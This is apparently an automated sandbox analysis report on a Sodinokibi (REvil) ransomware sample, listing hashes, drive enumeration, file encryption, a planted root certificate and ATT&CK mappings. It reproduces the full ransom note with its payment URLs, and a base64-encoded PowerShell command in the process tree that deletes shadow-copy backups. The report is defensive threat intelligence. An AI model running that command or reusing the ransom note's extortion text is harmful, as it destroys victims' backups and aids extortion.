sodinokibi | df724c49a1401d66f690b0a940f70bd286671448a625690ccdfdc4c42b4b5b07

General

Target

13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
Size

164KB
MD5

13d4c1451da6fa284c08c669a7d0e7c1
SHA1

2ea65287c7489d8ab5abd04e172c55d1518a4052
SHA256

df724c49a1401d66f690b0a940f70bd286671448a625690ccdfdc4c42b4b5b07
SHA512

f845335dd84b5bf9b20889dfd051bf012dfcf96adaf4f6de171b3a8e62f42cf03c0e18314ad6ca59ff3eb5e1c0ef3dce179845aac6582b9438c0b13809f47554
SSDEEP

3072:ffYWjswg4fQlt4ndm8jX5IXzs+M9VQHDO9KR/vOst3b:ffYWAw9fcUdmwIXo+M9VQHDxmst

Score

10^/10

sodinokibi ransomware

Malware Config

Extracted

Path

C:\Recovery\512x5vfh1-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion 512x5vfh1. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. If you have any questions, or experiencing troubles with the test decryption, you can use our chat on the website, our stuff support will help you as quick as possible. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A1B4700D81BA67DB 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/A1B4700D81BA67DB Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: tc6qHKja6tG9O9iTXSEx0xYjjYylTIsj+ik6bH+yHuNj+bNIb/7SqsRcujHp6uCl MMLXh3RdWIVXmUTR9YSPQdpRCuBxn6HfMtTXLKwRrrTtZoNYSwSyvXQ6EgP+eaMo QPSnasfYZfJknIWE9xfZFkaRKYVATJI2+P6L+qmBSuHKEkB9RYTd2Liv+emB5MYs Kq0bairvj4BfWYMFspdGj38cBS63O7KrpMC19eMPegjDncOkpC++fB+60IS5MH3i cxc9UHGxgHAH0lPbrk040FRMk9uhjVMMb8r8MiQkp5ov83I23nZG/ZAWcfz7eOeB VZlmuLwuZ+LdZrxRv6cyUKQCcpFWo+FFNqTXSIZFofGDuzy+xaL5cAkZEhZAegZt BqA09g2vjpMeOGjS0wWOnGgToCp3P9Y66PeTeRTSUpKW0jyTlaBOWBFhd3+ZANGv ubutyFmg6wzWu3TWFxTB9sntG3mkBGKrsonIrxnAT20KIcQJhiWnufw+17sK29g8 Iwujcl1zmlcygz7Uq5sCrAha9C/M2waHMkZE8/CEMrPuzv5bF7NXlJpg8xfT0AW4 vc9HEWcPJiudlDJXkJvUXVPJwUR3gn39B7kjpR1zueqCT1G8+AwJBMRewqNuIPVx dzDiy/2vt9C72zURBuYbEoQMMc1w9s0wTy76AuYveOz4du0mjDJ+yIAQMSafXgq7 2WDmRaK5Pg7CQIb9eRVKfuWHtqaeVj7i/JN/0CgeegFvrP6k6K1I5+s51hTiP0kC 9+n/9SaX32UdT21a/5194RMii/7Y/djdKZ2aMhf9Mc5xUMBE1+KPMi8I66p9QElq dnhmQNT2wx3NA3naHyZpAhviU2aq4ZI9HGFoNb9Aa3IsTpFzS1Q7y2ZsCESeogBB qvdyOWYu9jnbNyjZqZ/IcIbBMvwo0yCK+ght3/3jEExWKdfgTgnn8dYn37uQwIMd Av7u/SlqQuR8JUvVIjoUvWm8QXtkDF6SrmOPv9iqJliLWEeFW12MJZWYRW4YMw9f 8UBJeiB1LK/AhM2Y3fej5niS7uYrL7MCr16rpkVq38x2Lh5A4/jEcU1o/BF4VxwW W3DbTXu1cV5Em4CnxALnutBp2rBjxNtdrHZfQxUDBSMDgPgd8nOapIMZ1IOByO/j gqoJmD1ld6emgVyUJUx95Zadc9uLH/aVuaROb9Z8+hE7wnktzxP16Rj42z6AKdu+ a00wU5ApeO0amhvJqE1VYSNGdupqCA== Extension name: 512x5vfh1 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A1B4700D81BA67DB

http://decryptor.top/A1B4700D81BA67DB

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\S:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\U:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\I:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\N:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\P:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\T:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\F:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\R:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\Y:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\H:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\J:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\M:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\O:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\G:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\V:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\W:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\X:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\D:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\E:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\K:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\L:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\Z:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\A:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened (read-only)	\??\Q:	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\70042zy.bmp"	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe

Drops file in Program Files directory 29 IoCs

description	ioc	Process
File opened for modification	\??\c:\program files\ConvertToExport.xps	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\InvokeSelect.ADT	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ReadSearch.jpeg	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RequestComplete.dotm	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DismountStep.vstx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\OutExpand.avi	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ProtectShow.xlsb	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\MountSend.emz	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SplitExit.mp4v	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ExitStop.m1v	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\StartOpen.wax	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\UseOut.asx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EnableRestart.docm	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\FormatUndo.wm	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ProtectImport.docm	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SwitchUnblock.bmp	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File created	\??\c:\program files (x86)\512x5vfh1-readme.txt	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ApproveUpdate.mpeg	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EnableExport.vsx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RequestRegister.dxf	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File created	\??\c:\program files\512x5vfh1-readme.txt	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\EditStop.ogg	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\RedoDismount.docx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\SaveOpen.mp4v	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ShowMove.ppsx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ApproveGet.mhtml	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\DisableMeasure.ppsx	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\LockAdd.kix	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
File opened for modification	\??\c:\program files\ReceiveMerge.rm	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\58F6A68D38867D61B346F3BB298BCB0FCDD30A99	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\58F6A68D38867D61B346F3BB298BCB0FCDD30A99\Blob = 03000000010000001400000058f6a68d38867d61b346f3bb298bcb0fcdd30a99140000000100000014000000bd05b7f38a933c73cb79fa0f8512a177961891740400000001000000100000004c63082d06a1d58d998f46a381fa8ca10f0000000100000020000000e561fec47c5a1dcdc2e9b27ce54416bcddc73206f5b67a565da735f269ae8a791900000001000000100000002527850217b0428fdbf1e5e25e980c175c000000010000000400000000080000180000000100000010000000cb9dd0fceaaa492f75ce292c21bbfbdd2000000001000000900500003082058c30820374a00302010202107f1f2c902e83d0e3b6fb3bee478b5e80300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523631133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3233303731393033343332355a170d3236303731393030303030305a3055310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d7361312b302906035504031322476c6f62616c5369676e2047434320523620416c70686153534c204341203230323330820122300d06092a864886f70d01010105000382010f003082010a0282010100d3426f939003a693b4ae00e78f5335e1721bd37d806ace34f4924501bf1c5238a914eb61ef248b75a58b7b7b3ade84ace71dde5b0cd3a57e01164cd96f14f57a82521df4f6334c19e5038f702223b2bf9807c4c0bd5db2252caaf9e991acdfc5b600924da597489e638a95bc489fd502e5cf333b803f6c98a6e3dc8e34391b2aecb035e0bbe161b58c6ac853fb052bf1f63421879415e7384bc9cb9a9fc9fe274530d3d59140ae89190e47cc36508a790d7a5f9f6593511b5804f507a1fad1c1a65ae46a507583ce6a2643ce27b4a812f2ac98391a8e0824fec4aaecd3f2cc569afd50466624511be164c420678860f9eb5f0f438b6b7301f23288d214e6ce1d0203010001a382015f3082015b300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b0601050507030230120603551d130101ff040830060101ff020100301d0603551d0e04160414bd05b7f38a933c73cb79fa0f8512a17796189174301f0603551d23041830168014ae6c05a39313e2a2e7e2d71cd6c7f07fc86753a0307b06082b06010505070101046f306d302e06082b060105050730018622687474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f726f6f747236303b06082b06010505073002862f687474703a2f2f7365637572652e676c6f62616c7369676e2e636f6d2f6361636572742f726f6f742d72362e63727430360603551d1f042f302d302ba029a0278625687474703a2f2f63726c2e676c6f62616c7369676e2e636f6d2f726f6f742d72362e63726c30210603551d20041a30183008060667810c010201300c060a2b06010401a0320a0103300d06092a864886f70d01010b050003820201007cc924328e60e269f57ede1de31476907cd8a43ba4842d5760fc1f49937703d9c405a76374a64c1fb8ae4b5bc5f2e49c836ebfdf40d13de9f67c546cafaeb6102c94091e0e7de8a218d76842f71eb0cf57a5ec371cb40fe2a1e0facefbe2134bbc6443e1a2922b016a2ccadca82c3ab4401f5fdf6d156b03e23cdb0ba93cb6348bcc49747d35257e425a5a9bcb564a60f5eb7cb43f1de756f298283927a27ac1c5e99ac4869e4b01a1b69cd7e9d79a007b8d00bd79d53c678d45168f3b055de40adad65ac76441abce6ccb1750f97f00ef32fe33ae016cf4c32bcf9caa26fa8e96e2f28363affa5cfca935d79b389ea68f26882e9d2aba842f863c7cec1cc4361e6ce7b0083b2206a52d2c0c40a15433f32c47d1b07d8527cfd6e70a05d27bec053a9f6120aa6e541b1de0c3b428fb3257fc25fa9a32ea9c6c4e2b312c9f787c827594309dcfebf6e8e7b61ebdd40261c7261e08cd3899eb4921eedc07a7787459be3dde5eaef638c77dabd2e435434b29cb556336a5098eeb2c62e5cdc8c9851d2b8b410e8fade3e61f995c48c42960accfa03fd188d543fcf2b43b7bee3b9be1de8ee829bd457f3a1a9c3b05153af0d1a2ce7515bfb662cf5953559406fc69df81f34609b0be075d89d01bcc180056fc2e1c120f24fdbfe0b50b595c20713b9c4d00029f49487c4362c99af698b88343e18370603a6d9eb93473c3b4744b35	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4328	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
4328	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
2784	powershell.exe
2784	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeBackupPrivilege	1372	vssvc.exe
Token: SeRestorePrivilege	1372	vssvc.exe
Token: SeAuditPrivilege	1372	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 4328 wrote to memory of 2784	4328	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe	90
PID 4328 wrote to memory of 2784	4328	13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe	90

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\13d4c1451da6fa284c08c669a7d0e7c1_JaffaCakes118.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2784

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Recovery\512x5vfh1-readme.txt

Filesize
7KB

MD5
db19d336d63fb8e9bae02aeb570fb9d2

SHA1
899d4fa30eae6bd9d9277e640928063270d1755d

SHA256
fb87474bdaac47dcb1cc4cdd52a743c0ccfdca1960d301b13f6a624ecce34d01

SHA512
0aba91ac77f546baf4e9c9c52cbf91c16586d1491063e9ea4715f871921135f185035b9e7d2099e58ce5530212a7f069e36a1e1c409a7eb9264e751c14ee6479

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3wlrgked.ljv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2784-0-0x00007FF9EAB73000-0x00007FF9EAB75000-memory.dmp

Filesize
8KB

Download
memory/2784-10-0x00000292F2BA0000-0x00000292F2BC2000-memory.dmp

Filesize
136KB

Download
memory/2784-11-0x00007FF9EAB70000-0x00007FF9EB631000-memory.dmp

Filesize
10.8MB

Download
memory/2784-12-0x00007FF9EAB70000-0x00007FF9EB631000-memory.dmp

Filesize
10.8MB

Download
memory/2784-15-0x00007FF9EAB70000-0x00007FF9EB631000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads